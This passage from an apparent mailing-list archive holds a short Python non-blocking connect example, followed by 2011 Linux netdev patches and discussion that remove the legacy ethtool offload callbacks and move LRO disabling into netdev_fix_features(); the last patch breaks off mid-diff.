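TCP socket over IPv4; start_connect and finish_connect are names invented
for this example, and the 5 second timeout is arbitrary. The points it
illustrates are the ones made above: look at the return value of connect()
itself, and read SO_ERROR only once, since reading it clears the error.

```python
import errno
import select
import socket


def start_connect(addr):
    """Begin a non-blocking connect; return (sock, errno from connect)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setblocking(False)
    # connect_ex() returns 0, EINPROGRESS, or an immediate failure code.
    err = sock.connect_ex(addr)
    return sock, err


def finish_connect(sock, first_err, timeout=5.0):
    """Return 0 on success, or the errno explaining why connect failed."""
    if first_err not in (0, errno.EINPROGRESS):
        # The error was already reported by connect(); do not wait for it.
        return first_err
    _, writable, _ = select.select([], [sock], [], timeout)
    if not writable:
        return errno.ETIMEDOUT
    # Read SO_ERROR exactly once: the call clears the pending error.
    return sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
```

If the caller stores the value returned by finish_connect() instead of
querying the socket again later, a cleared SO_ERROR can no longer be
mistaken for a connect that is still in progress.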




^ permalink raw reply

* Re: [RFT PATCH] net: remove legacy ethtool ops
From: Jeff Kirsher @ 2011-05-07 11:58 UTC (permalink / raw)
  To: Michał Mirosław
  Cc: netdev, David S. Miller, Patrick McHardy, Ben Hutchings,
	e1000-devel
In-Reply-To: <20110507114802.A0C841389B@rere.qmqm.pl>

2011/5/7 Michał Mirosław <mirq-linux@rere.qmqm.pl>:
> As all drivers are converted, we may now remove discrete offload setting
> callback handling.
>
> Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
> ---
>
> Note: This needs to wait for Intel guys to finish conversion of their
> LAN drivers.
>
>  include/linux/ethtool.h   |   52 ------
>  include/linux/netdevice.h |   16 --
>  net/8021q/vlan_dev.c      |    2 +-
>  net/core/dev.c            |   13 +-
>  net/core/ethtool.c        |  399 +++------------------------------------------
>  5 files changed, 28 insertions(+), 454 deletions(-)
>

I do apologize for the delay, we did find several problems with the
original set of patches you submitted during review and testing.
Currently we have fixed up the e1000e, yet there is still work to be
done on the other drivers.  I will make every effort to make sure that
we complete the work over the next week.

-- 
Cheers,
Jeff

^ permalink raw reply

* [RFT PATCH] net: remove legacy ethtool ops
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev
  Cc: David S. Miller, Patrick McHardy, Ben Hutchings, Jeff Kirsher,
	e1000-devel

As all drivers are converted, we may now remove discrete offload setting
callback handling.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---

Note: This needs to wait for Intel guys to finish conversion of their
LAN drivers.

 include/linux/ethtool.h   |   52 ------
 include/linux/netdevice.h |   16 --
 net/8021q/vlan_dev.c      |    2 +-
 net/core/dev.c            |   13 +-
 net/core/ethtool.c        |  399 +++------------------------------------------
 5 files changed, 28 insertions(+), 454 deletions(-)

diff --git a/include/linux/ethtool.h b/include/linux/ethtool.h
index 4194a20..2ef53fa 100644
--- a/include/linux/ethtool.h
+++ b/include/linux/ethtool.h
@@ -691,9 +691,6 @@ enum ethtool_sfeatures_retval_bits {
 
 #include <linux/rculist.h>
 
-/* needed by dev_disable_lro() */
-extern int __ethtool_set_flags(struct net_device *dev, u32 flags);
-
 struct ethtool_rx_ntuple_flow_spec_container {
 	struct ethtool_rx_ntuple_flow_spec fs;
 	struct list_head list;
@@ -726,18 +723,6 @@ struct net_device;
 
 /* Some generic methods drivers may use in their ethtool_ops */
 u32 ethtool_op_get_link(struct net_device *dev);
-u32 ethtool_op_get_tx_csum(struct net_device *dev);
-int ethtool_op_set_tx_csum(struct net_device *dev, u32 data);
-int ethtool_op_set_tx_hw_csum(struct net_device *dev, u32 data);
-int ethtool_op_set_tx_ipv6_csum(struct net_device *dev, u32 data);
-u32 ethtool_op_get_sg(struct net_device *dev);
-int ethtool_op_set_sg(struct net_device *dev, u32 data);
-u32 ethtool_op_get_tso(struct net_device *dev);
-int ethtool_op_set_tso(struct net_device *dev, u32 data);
-u32 ethtool_op_get_ufo(struct net_device *dev);
-int ethtool_op_set_ufo(struct net_device *dev, u32 data);
-u32 ethtool_op_get_flags(struct net_device *dev);
-int ethtool_op_set_flags(struct net_device *dev, u32 data, u32 supported);
 void ethtool_ntuple_flush(struct net_device *dev);
 bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
 
@@ -784,22 +769,6 @@ bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
  * @get_pauseparam: Report pause parameters
  * @set_pauseparam: Set pause parameters.  Returns a negative error code
  *	or zero.
- * @get_rx_csum: Deprecated in favour of the netdev feature %NETIF_F_RXCSUM.
- *	Report whether receive checksums are turned on or off.
- * @set_rx_csum: Deprecated in favour of generic netdev features.  Turn
- *	receive checksum on or off.  Returns a negative error code or zero.
- * @get_tx_csum: Deprecated as redundant. Report whether transmit checksums
- *	are turned on or off.
- * @set_tx_csum: Deprecated in favour of generic netdev features.  Turn
- *	transmit checksums on or off.  Returns a egative error code or zero.
- * @get_sg: Deprecated as redundant.  Report whether scatter-gather is
- *	enabled.  
- * @set_sg: Deprecated in favour of generic netdev features.  Turn
- *	scatter-gather on or off. Returns a negative error code or zero.
- * @get_tso: Deprecated as redundant.  Report whether TCP segmentation
- *	offload is enabled.
- * @set_tso: Deprecated in favour of generic netdev features.  Turn TCP
- *	segmentation offload on or off.  Returns a negative error code or zero.
  * @self_test: Run specified self-tests
  * @get_strings: Return a set of strings that describe the requested objects
  * @set_phys_id: Identify the physical devices, e.g. by flashing an LED
@@ -827,15 +796,6 @@ bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported);
  *	negative error code or zero.
  * @complete: Function to be called after any other operation except
  *	@begin.  Will be called even if the other operation failed.
- * @get_ufo: Deprecated as redundant.  Report whether UDP fragmentation
- *	offload is enabled.
- * @set_ufo: Deprecated in favour of generic netdev features.  Turn UDP
- *	fragmentation offload on or off.  Returns a negative error code or zero.
- * @get_flags: Deprecated as redundant.  Report features included in
- *	&enum ethtool_flags that are enabled.  
- * @set_flags: Deprecated in favour of generic netdev features.  Turn
- *	features included in &enum ethtool_flags on or off.  Returns a
- *	negative error code or zero.
  * @get_priv_flags: Report driver-specific feature flags.
  * @set_priv_flags: Set driver-specific feature flags.  Returns a negative
  *	error code or zero.
@@ -897,14 +857,6 @@ struct ethtool_ops {
 				  struct ethtool_pauseparam*);
 	int	(*set_pauseparam)(struct net_device *,
 				  struct ethtool_pauseparam*);
-	u32	(*get_rx_csum)(struct net_device *);
-	int	(*set_rx_csum)(struct net_device *, u32);
-	u32	(*get_tx_csum)(struct net_device *);
-	int	(*set_tx_csum)(struct net_device *, u32);
-	u32	(*get_sg)(struct net_device *);
-	int	(*set_sg)(struct net_device *, u32);
-	u32	(*get_tso)(struct net_device *);
-	int	(*set_tso)(struct net_device *, u32);
 	void	(*self_test)(struct net_device *, struct ethtool_test *, u64 *);
 	void	(*get_strings)(struct net_device *, u32 stringset, u8 *);
 	int	(*set_phys_id)(struct net_device *, enum ethtool_phys_id_state);
@@ -913,10 +865,6 @@ struct ethtool_ops {
 				     struct ethtool_stats *, u64 *);
 	int	(*begin)(struct net_device *);
 	void	(*complete)(struct net_device *);
-	u32	(*get_ufo)(struct net_device *);
-	int	(*set_ufo)(struct net_device *, u32);
-	u32	(*get_flags)(struct net_device *);
-	int	(*set_flags)(struct net_device *, u32);
 	u32	(*get_priv_flags)(struct net_device *);
 	int	(*set_priv_flags)(struct net_device *, u32);
 	int	(*get_sset_count)(struct net_device *, int);
diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index d5de66a..7be3ca2 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2600,22 +2600,6 @@ extern struct pernet_operations __net_initdata loopback_net_ops;
 int dev_ethtool_get_settings(struct net_device *dev,
 			     struct ethtool_cmd *cmd);
 
-static inline u32 dev_ethtool_get_rx_csum(struct net_device *dev)
-{
-	if (dev->features & NETIF_F_RXCSUM)
-		return 1;
-	if (!dev->ethtool_ops || !dev->ethtool_ops->get_rx_csum)
-		return 0;
-	return dev->ethtool_ops->get_rx_csum(dev);
-}
-
-static inline u32 dev_ethtool_get_flags(struct net_device *dev)
-{
-	if (!dev->ethtool_ops || !dev->ethtool_ops->get_flags)
-		return 0;
-	return dev->ethtool_ops->get_flags(dev);
-}
-
 /* Logging, debugging and troubleshooting/diagnostic helpers. */
 
 /* netdev_printk helpers, similar to dev_printk */
diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
index 526159a..df66715 100644
--- a/net/8021q/vlan_dev.c
+++ b/net/8021q/vlan_dev.c
@@ -592,7 +592,7 @@ static u32 vlan_dev_fix_features(struct net_device *dev, u32 features)
 
 	features &= real_dev->features;
 	features &= real_dev->vlan_features;
-	if (dev_ethtool_get_rx_csum(real_dev))
+	if (real_dev->features & NETIF_F_RXCSUM)
 		features |= NETIF_F_RXCSUM;
 	features |= NETIF_F_LLTX;
 
diff --git a/net/core/dev.c b/net/core/dev.c
index 44ef8f8..7193499 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -1304,19 +1304,12 @@ EXPORT_SYMBOL(dev_close);
  */
 void dev_disable_lro(struct net_device *dev)
 {
-	u32 flags;
+	dev->wanted_features &= ~NETIF_F_LRO;
+	netdev_update_features(dev);
 
-	if (dev->ethtool_ops && dev->ethtool_ops->get_flags)
-		flags = dev->ethtool_ops->get_flags(dev);
-	else
-		flags = ethtool_op_get_flags(dev);
-
-	if (!(flags & ETH_FLAG_LRO))
-		return;
-
-	__ethtool_set_flags(dev, flags & ~ETH_FLAG_LRO);
 	if (unlikely(dev->features & NETIF_F_LRO))
 		netdev_WARN(dev, "failed to disable LRO!\n");
+
 }
 EXPORT_SYMBOL(dev_disable_lro);
 
diff --git a/net/core/ethtool.c b/net/core/ethtool.c
index d8b1a8d..34f32b0 100644
--- a/net/core/ethtool.c
+++ b/net/core/ethtool.c
@@ -36,139 +36,6 @@ u32 ethtool_op_get_link(struct net_device *dev)
 }
 EXPORT_SYMBOL(ethtool_op_get_link);
 
-u32 ethtool_op_get_tx_csum(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_ALL_CSUM) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_tx_csum);
-
-int ethtool_op_set_tx_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_IP_CSUM;
-	else
-		dev->features &= ~NETIF_F_IP_CSUM;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_csum);
-
-int ethtool_op_set_tx_hw_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_HW_CSUM;
-	else
-		dev->features &= ~NETIF_F_HW_CSUM;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_hw_csum);
-
-int ethtool_op_set_tx_ipv6_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
-	else
-		dev->features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_ipv6_csum);
-
-u32 ethtool_op_get_sg(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_SG) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_sg);
-
-int ethtool_op_set_sg(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_SG;
-	else
-		dev->features &= ~NETIF_F_SG;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_sg);
-
-u32 ethtool_op_get_tso(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_TSO) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_tso);
-
-int ethtool_op_set_tso(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_TSO;
-	else
-		dev->features &= ~NETIF_F_TSO;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tso);
-
-u32 ethtool_op_get_ufo(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_UFO) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_ufo);
-
-int ethtool_op_set_ufo(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_UFO;
-	else
-		dev->features &= ~NETIF_F_UFO;
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_ufo);
-
-/* the following list of flags are the same as their associated
- * NETIF_F_xxx values in include/linux/netdevice.h
- */
-static const u32 flags_dup_features =
-	(ETH_FLAG_LRO | ETH_FLAG_RXVLAN | ETH_FLAG_TXVLAN | ETH_FLAG_NTUPLE |
-	 ETH_FLAG_RXHASH);
-
-u32 ethtool_op_get_flags(struct net_device *dev)
-{
-	/* in the future, this function will probably contain additional
-	 * handling for flags which are not so easily handled
-	 * by a simple masking operation
-	 */
-
-	return dev->features & flags_dup_features;
-}
-EXPORT_SYMBOL(ethtool_op_get_flags);
-
-/* Check if device can enable (or disable) particular feature coded in "data"
- * argument. Flags "supported" describe features that can be toggled by device.
- * If feature can not be toggled, it state (enabled or disabled) must match
- * hardcoded device features state, otherwise flags are marked as invalid.
- */
-bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported)
-{
-	u32 features = dev->features & flags_dup_features;
-	/* "data" can contain only flags_dup_features bits,
-	 * see __ethtool_set_flags */
-
-	return (features & ~supported) != (data & ~supported);
-}
-EXPORT_SYMBOL(ethtool_invalid_flags);
-
-int ethtool_op_set_flags(struct net_device *dev, u32 data, u32 supported)
-{
-	if (ethtool_invalid_flags(dev, data, supported))
-		return -EINVAL;
-
-	dev->features = ((dev->features & ~flags_dup_features) |
-			 (data & flags_dup_features));
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_flags);
-
 void ethtool_ntuple_flush(struct net_device *dev)
 {
 	struct ethtool_rx_ntuple_flow_spec_container *fsc, *f;
@@ -185,76 +52,6 @@ EXPORT_SYMBOL(ethtool_ntuple_flush);
 
 #define ETHTOOL_DEV_FEATURE_WORDS	1
 
-static void ethtool_get_features_compat(struct net_device *dev,
-	struct ethtool_get_features_block *features)
-{
-	if (!dev->ethtool_ops)
-		return;
-
-	/* getting RX checksum */
-	if (dev->ethtool_ops->get_rx_csum)
-		if (dev->ethtool_ops->get_rx_csum(dev))
-			features[0].active |= NETIF_F_RXCSUM;
-
-	/* mark legacy-changeable features */
-	if (dev->ethtool_ops->set_sg)
-		features[0].available |= NETIF_F_SG;
-	if (dev->ethtool_ops->set_tx_csum)
-		features[0].available |= NETIF_F_ALL_CSUM;
-	if (dev->ethtool_ops->set_tso)
-		features[0].available |= NETIF_F_ALL_TSO;
-	if (dev->ethtool_ops->set_rx_csum)
-		features[0].available |= NETIF_F_RXCSUM;
-	if (dev->ethtool_ops->set_flags)
-		features[0].available |= flags_dup_features;
-}
-
-static int ethtool_set_feature_compat(struct net_device *dev,
-	int (*legacy_set)(struct net_device *, u32),
-	struct ethtool_set_features_block *features, u32 mask)
-{
-	u32 do_set;
-
-	if (!legacy_set)
-		return 0;
-
-	if (!(features[0].valid & mask))
-		return 0;
-
-	features[0].valid &= ~mask;
-
-	do_set = !!(features[0].requested & mask);
-
-	if (legacy_set(dev, do_set) < 0)
-		netdev_info(dev,
-			"Legacy feature change (%s) failed for 0x%08x\n",
-			do_set ? "set" : "clear", mask);
-
-	return 1;
-}
-
-static int ethtool_set_features_compat(struct net_device *dev,
-	struct ethtool_set_features_block *features)
-{
-	int compat;
-
-	if (!dev->ethtool_ops)
-		return 0;
-
-	compat  = ethtool_set_feature_compat(dev, dev->ethtool_ops->set_sg,
-		features, NETIF_F_SG);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_tx_csum,
-		features, NETIF_F_ALL_CSUM);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_tso,
-		features, NETIF_F_ALL_TSO);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_rx_csum,
-		features, NETIF_F_RXCSUM);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_flags,
-		features, flags_dup_features);
-
-	return compat;
-}
-
 static int ethtool_get_features(struct net_device *dev, void __user *useraddr)
 {
 	struct ethtool_gfeatures cmd = {
@@ -272,8 +69,6 @@ static int ethtool_get_features(struct net_device *dev, void __user *useraddr)
 	u32 __user *sizeaddr;
 	u32 copy_size;
 
-	ethtool_get_features_compat(dev, features);
-
 	sizeaddr = useraddr + offsetof(struct ethtool_gfeatures, size);
 	if (get_user(copy_size, sizeaddr))
 		return -EFAULT;
@@ -309,9 +104,6 @@ static int ethtool_set_features(struct net_device *dev, void __user *useraddr)
 	if (features[0].valid & ~NETIF_F_ETHTOOL_BITS)
 		return -EINVAL;
 
-	if (ethtool_set_features_compat(dev, features))
-		ret |= ETHTOOL_F_COMPAT;
-
 	if (features[0].valid & ~dev->hw_features) {
 		features[0].valid &= dev->hw_features;
 		ret |= ETHTOOL_F_UNSUPPORTED;
@@ -422,34 +214,6 @@ static u32 ethtool_get_feature_mask(u32 eth_cmd)
 	}
 }
 
-static void *__ethtool_get_one_feature_actor(struct net_device *dev, u32 ethcmd)
-{
-	const struct ethtool_ops *ops = dev->ethtool_ops;
-
-	if (!ops)
-		return NULL;
-
-	switch (ethcmd) {
-	case ETHTOOL_GTXCSUM:
-		return ops->get_tx_csum;
-	case ETHTOOL_GRXCSUM:
-		return ops->get_rx_csum;
-	case ETHTOOL_SSG:
-		return ops->get_sg;
-	case ETHTOOL_STSO:
-		return ops->get_tso;
-	case ETHTOOL_SUFO:
-		return ops->get_ufo;
-	default:
-		return NULL;
-	}
-}
-
-static u32 __ethtool_get_rx_csum_oldbug(struct net_device *dev)
-{
-	return !!(dev->features & NETIF_F_ALL_CSUM);
-}
-
 static int ethtool_get_one_feature(struct net_device *dev,
 	char __user *useraddr, u32 ethcmd)
 {
@@ -459,31 +223,11 @@ static int ethtool_get_one_feature(struct net_device *dev,
 		.data = !!(dev->features & mask),
 	};
 
-	/* compatibility with discrete get_ ops */
-	if (!(dev->hw_features & mask)) {
-		u32 (*actor)(struct net_device *);
-
-		actor = __ethtool_get_one_feature_actor(dev, ethcmd);
-
-		/* bug compatibility with old get_rx_csum */
-		if (ethcmd == ETHTOOL_GRXCSUM && !actor)
-			actor = __ethtool_get_rx_csum_oldbug;
-
-		if (actor)
-			edata.data = actor(dev);
-	}
-
 	if (copy_to_user(useraddr, &edata, sizeof(edata)))
 		return -EFAULT;
 	return 0;
 }
 
-static int __ethtool_set_tx_csum(struct net_device *dev, u32 data);
-static int __ethtool_set_rx_csum(struct net_device *dev, u32 data);
-static int __ethtool_set_sg(struct net_device *dev, u32 data);
-static int __ethtool_set_tso(struct net_device *dev, u32 data);
-static int __ethtool_set_ufo(struct net_device *dev, u32 data);
-
 static int ethtool_set_one_feature(struct net_device *dev,
 	void __user *useraddr, u32 ethcmd)
 {
@@ -495,56 +239,38 @@ static int ethtool_set_one_feature(struct net_device *dev,
 
 	mask = ethtool_get_feature_mask(ethcmd);
 	mask &= dev->hw_features;
-	if (mask) {
-		if (edata.data)
-			dev->wanted_features |= mask;
-		else
-			dev->wanted_features &= ~mask;
-
-		__netdev_update_features(dev);
-		return 0;
-	}
-
-	/* Driver is not converted to ndo_fix_features or does not
-	 * support changing this offload. In the latter case it won't
-	 * have corresponding ethtool_ops field set.
-	 *
-	 * Following part is to be removed after all drivers advertise
-	 * their changeable features in netdev->hw_features and stop
-	 * using discrete offload setting ops.
-	 */
-
-	switch (ethcmd) {
-	case ETHTOOL_STXCSUM:
-		return __ethtool_set_tx_csum(dev, edata.data);
-	case ETHTOOL_SRXCSUM:
-		return __ethtool_set_rx_csum(dev, edata.data);
-	case ETHTOOL_SSG:
-		return __ethtool_set_sg(dev, edata.data);
-	case ETHTOOL_STSO:
-		return __ethtool_set_tso(dev, edata.data);
-	case ETHTOOL_SUFO:
-		return __ethtool_set_ufo(dev, edata.data);
-	default:
+	if (!mask)
 		return -EOPNOTSUPP;
-	}
+
+	if (edata.data)
+		dev->wanted_features |= mask;
+	else
+		dev->wanted_features &= ~mask;
+
+	__netdev_update_features(dev);
+
+	return 0;
+}
+
+/* the following list of flags are the same as their associated
+ * NETIF_F_xxx values in include/linux/netdevice.h
+ */
+static const u32 flags_dup_features =
+	(ETH_FLAG_LRO | ETH_FLAG_RXVLAN | ETH_FLAG_TXVLAN | ETH_FLAG_NTUPLE |
+	 ETH_FLAG_RXHASH);
+
+static u32 __ethtool_get_flags(struct net_device *dev)
+{
+	return dev->features & flags_dup_features;
 }
 
-int __ethtool_set_flags(struct net_device *dev, u32 data)
+static int __ethtool_set_flags(struct net_device *dev, u32 data)
 {
 	u32 changed;
 
 	if (data & ~flags_dup_features)
 		return -EINVAL;
 
-	/* legacy set_flags() op */
-	if (dev->ethtool_ops->set_flags) {
-		if (unlikely(dev->hw_features & flags_dup_features))
-			netdev_warn(dev,
-				"driver BUG: mixed hw_features and set_flags()\n");
-		return dev->ethtool_ops->set_flags(dev, data);
-	}
-
 	/* allow changing only bits set in hw_features */
 	changed = (data ^ dev->features) & flags_dup_features;
 	if (changed & ~dev->hw_features)
@@ -1502,81 +1228,6 @@ static int ethtool_set_pauseparam(struct net_device *dev, void __user *useraddr)
 	return dev->ethtool_ops->set_pauseparam(dev, &pauseparam);
 }
 
-static int __ethtool_set_sg(struct net_device *dev, u32 data)
-{
-	int err;
-
-	if (!dev->ethtool_ops->set_sg)
-		return -EOPNOTSUPP;
-
-	if (data && !(dev->features & NETIF_F_ALL_CSUM))
-		return -EINVAL;
-
-	if (!data && dev->ethtool_ops->set_tso) {
-		err = dev->ethtool_ops->set_tso(dev, 0);
-		if (err)
-			return err;
-	}
-
-	if (!data && dev->ethtool_ops->set_ufo) {
-		err = dev->ethtool_ops->set_ufo(dev, 0);
-		if (err)
-			return err;
-	}
-	return dev->ethtool_ops->set_sg(dev, data);
-}
-
-static int __ethtool_set_tx_csum(struct net_device *dev, u32 data)
-{
-	int err;
-
-	if (!dev->ethtool_ops->set_tx_csum)
-		return -EOPNOTSUPP;
-
-	if (!data && dev->ethtool_ops->set_sg) {
-		err = __ethtool_set_sg(dev, 0);
-		if (err)
-			return err;
-	}
-
-	return dev->ethtool_ops->set_tx_csum(dev, data);
-}
-
-static int __ethtool_set_rx_csum(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_rx_csum)
-		return -EOPNOTSUPP;
-
-	if (!data)
-		dev->features &= ~NETIF_F_GRO;
-
-	return dev->ethtool_ops->set_rx_csum(dev, data);
-}
-
-static int __ethtool_set_tso(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_tso)
-		return -EOPNOTSUPP;
-
-	if (data && !(dev->features & NETIF_F_SG))
-		return -EINVAL;
-
-	return dev->ethtool_ops->set_tso(dev, data);
-}
-
-static int __ethtool_set_ufo(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_ufo)
-		return -EOPNOTSUPP;
-	if (data && !(dev->features & NETIF_F_SG))
-		return -EINVAL;
-	if (data && !((dev->features & NETIF_F_GEN_CSUM) ||
-		(dev->features & (NETIF_F_IP_CSUM|NETIF_F_IPV6_CSUM))
-			== (NETIF_F_IP_CSUM|NETIF_F_IPV6_CSUM)))
-		return -EINVAL;
-	return dev->ethtool_ops->set_ufo(dev, data);
-}
-
 static int ethtool_self_test(struct net_device *dev, char __user *useraddr)
 {
 	struct ethtool_test test;
@@ -1965,9 +1616,7 @@ int dev_ethtool(struct net *net, struct ifreq *ifr)
 		break;
 	case ETHTOOL_GFLAGS:
 		rc = ethtool_get_value(dev, useraddr, ethcmd,
-				       (dev->ethtool_ops->get_flags ?
-					dev->ethtool_ops->get_flags :
-					ethtool_op_get_flags));
+					__ethtool_get_flags);
 		break;
 	case ETHTOOL_SFLAGS:
 		rc = ethtool_set_value(dev, useraddr, __ethtool_set_flags);
-- 
1.7.2.5
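
For readers following the diff, the simplified ethtool_set_one_feature()
flow can be sketched in userspace as below. This is only an illustration
under stated assumptions: struct mock_netdev and mock_set_one_feature()
are hypothetical stand-ins, not kernel API, and the real function also
copies the request from userspace and calls __netdev_update_features().

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the two struct net_device fields used here. */
struct mock_netdev {
	uint32_t hw_features;     /* bits the driver allows to be toggled */
	uint32_t wanted_features; /* bits the user has asked for */
};

/*
 * Mirrors the post-patch flow: bits not advertised in hw_features are
 * rejected with -EOPNOTSUPP; otherwise the request is recorded in
 * wanted_features. No legacy per-feature ethtool op is consulted.
 */
static int mock_set_one_feature(struct mock_netdev *dev, uint32_t mask,
				int enable)
{
	assert(dev != NULL);

	mask &= dev->hw_features;
	if (!mask)
		return -EOPNOTSUPP;

	if (enable)
		dev->wanted_features |= mask;
	else
		dev->wanted_features &= ~mask;

	/* The kernel would call __netdev_update_features(dev) here. */
	return 0;
}
```

The point of the sketch is that hw_features becomes the only gate: a
driver that does not advertise a bit there can no longer have it changed
through a discrete set_* op.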



* [RFC PATCH] net: fold dev_disable_lro() into netdev_fix_features()
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev
  Cc: David S. Miller, Stephen Hemminger, Alexey Kuznetsov,
	Pekka Savola (ipv6), James Morris, Hideaki YOSHIFUJI,
	Patrick McHardy, Eric Dumazet, Tom Herbert, Ben Hutchings, bridge

This moves the checks for whether a device is forwarding from the bridge,
IPv4 and IPv6 code into netdev_fix_features(). As a side effect, a device
gets LRO back once it is no longer forwarding. This also means that the
user cannot enable LRO while the device is in forwarding mode.

This patch depends on the removal of the discrete offload-setting ethtool ops.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 include/linux/netdevice.h |    1 -
 net/bridge/br_if.c        |    6 +++---
 net/core/dev.c            |   41 +++++++++++++++++++++--------------------
 net/ipv4/devinet.c        |   20 +++++++++-----------
 net/ipv6/addrconf.c       |    7 +++----
 5 files changed, 36 insertions(+), 39 deletions(-)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 7be3ca2..3a8c21d 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1627,7 +1627,6 @@ extern struct net_device	*__dev_get_by_name(struct net *net, const char *name);
 extern int		dev_alloc_name(struct net_device *dev, const char *name);
 extern int		dev_open(struct net_device *dev);
 extern int		dev_close(struct net_device *dev);
-extern void		dev_disable_lro(struct net_device *dev);
 extern int		dev_queue_xmit(struct sk_buff *skb);
 extern int		register_netdevice(struct net_device *dev);
 extern void		unregister_netdevice_queue(struct net_device *dev,
diff --git a/net/bridge/br_if.c b/net/bridge/br_if.c
index 5dbdfdf..62aab1e 100644
--- a/net/bridge/br_if.c
+++ b/net/bridge/br_if.c
@@ -158,6 +158,8 @@ static void del_nbp(struct net_bridge_port *p)
 	br_netpoll_disable(p);
 
 	call_rcu(&p->rcu, destroy_nbp_rcu);
+
+	netdev_update_features(dev);
 }
 
 /* called with RTNL */
@@ -368,11 +370,9 @@ int br_add_if(struct net_bridge *br, struct net_device *dev)
 
 	dev->priv_flags |= IFF_BRIDGE_PORT;
 
-	dev_disable_lro(dev);
-
 	list_add_rcu(&p->list, &br->port_list);
 
-	netdev_update_features(br->dev);
+	netdev_update_features(dev);
 
 	spin_lock_bh(&br->lock);
 	changed_addr = br_stp_recalculate_bridge_id(br);
diff --git a/net/core/dev.c b/net/core/dev.c
index 7193499..3d646c9 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -132,6 +132,7 @@
 #include <trace/events/skb.h>
 #include <linux/pci.h>
 #include <linux/inetdevice.h>
+#include <net/addrconf.h>
 #include <linux/cpu_rmap.h>
 
 #include "net-sysfs.h"
@@ -1294,26 +1295,6 @@ int dev_close(struct net_device *dev)
 EXPORT_SYMBOL(dev_close);
 
 
-/**
- *	dev_disable_lro - disable Large Receive Offload on a device
- *	@dev: device
- *
- *	Disable Large Receive Offload (LRO) on a net device.  Must be
- *	called under RTNL.  This is needed if received packets may be
- *	forwarded to another interface.
- */
-void dev_disable_lro(struct net_device *dev)
-{
-	dev->wanted_features &= ~NETIF_F_LRO;
-	netdev_update_features(dev);
-
-	if (unlikely(dev->features & NETIF_F_LRO))
-		netdev_WARN(dev, "failed to disable LRO!\n");
-
-}
-EXPORT_SYMBOL(dev_disable_lro);
-
-
 static int dev_boot_phase = 1;
 
 /**
@@ -5239,6 +5220,26 @@ u32 netdev_fix_features(struct net_device *dev, u32 features)
 		}
 	}
 
+	if (features & NETIF_F_LRO) {
+		struct in_device *in4_dev;
+		struct inet6_dev *in6_dev;
+
+		/* disable LRO for bridge ports */
+		if (dev->priv_flags & IFF_BRIDGE_PORT) {
+			netdev_info(dev, "Disabling LRO for bridge port.\n");
+			features &= ~NETIF_F_LRO;
+		} else /* ... or when forwarding IPv4 */
+		if (((in4_dev = __in_dev_get_rtnl(dev))) &&
+		    IN_DEV_CONF_GET(in4_dev, FORWARDING)) {
+			netdev_info(dev, "Disabling LRO for IPv4 router port.\n");
+			features &= ~NETIF_F_LRO;
+		} else /* ... or when forwarding IPv6 */
+		if (((in6_dev = __in6_dev_get(dev))) && in6_dev->cnf.forwarding) {
+			netdev_info(dev, "Disabling LRO for IPv6 router port.\n");
+			features &= ~NETIF_F_LRO;
+		}
+	}
+
 	return features;
 }
 EXPORT_SYMBOL(netdev_fix_features);
diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
index cd9ca08..e9c0557 100644
--- a/net/ipv4/devinet.c
+++ b/net/ipv4/devinet.c
@@ -245,8 +245,6 @@ static struct in_device *inetdev_init(struct net_device *dev)
